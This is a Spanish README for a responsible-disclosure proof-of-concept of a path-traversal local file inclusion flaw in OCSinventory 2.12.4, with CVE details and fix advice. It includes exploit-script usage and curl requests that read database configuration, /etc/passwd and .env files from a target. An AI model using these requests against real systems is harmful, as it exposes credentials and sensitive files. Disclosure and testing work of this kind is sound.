
Este es el repositorio oficial con el PoC del CVE-2026-16475, LFI en OCSinventory 2.12.4.
Vulnerabilidad de inclusión de archivos locales en OCSinventory 2.12.4
ID CVE: CVE-2026-16475
Puntuación CVSS: 6.9 (Media)
CWE: CWE-98 (Control inadecuado del nombre de archivo para la declaración Include/Require en un programa PHP)
Versión afectada: OCSinventory 2.12.4
Estado: Corregido en las últimas versiones
Existe una vulnerabilidad de inclusión de archivos locales (LFI) en el endpoint /ajax/teledeployoptions.php debido a una sanitización inadecuada del parámetro linkedoptions antes de su uso en una operación dinámica de inclusión de archivos XML.
El endpoint está diseñado para cargar archivos de configuración XML, pero no valida correctamente el parámetro linkedoptions, lo que permite ataques de path traversal (recorrido de rutas).
Un atacante remoto no autenticado puede explotar esta vulnerabilidad para:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
Opciones:
-u, --url - URL objetivo (obligatorio)-v, --verbose - Salida verbosa-o, --output - Guardar las lecturas exitosas en un archivoEjemplo:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
Edita la variable BASE_URL en el script:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
Para usuarios:
Para desarrolladores:
basename() o funciones similares para prevenir el path traversalNota: CVE-2026-16475 está coordinado a través de INCIBE y puede que aún no esté indexado en NVD. Consulta la fuente de INCIBE para obtener información autoritativa.
Solo para fines educativos y pruebas autorizadas
Consulta DISCLAIMER.md para el aviso legal completo.
Adrián Ferrer Tarí
Divulgación responsable coordinada a través de INCIBE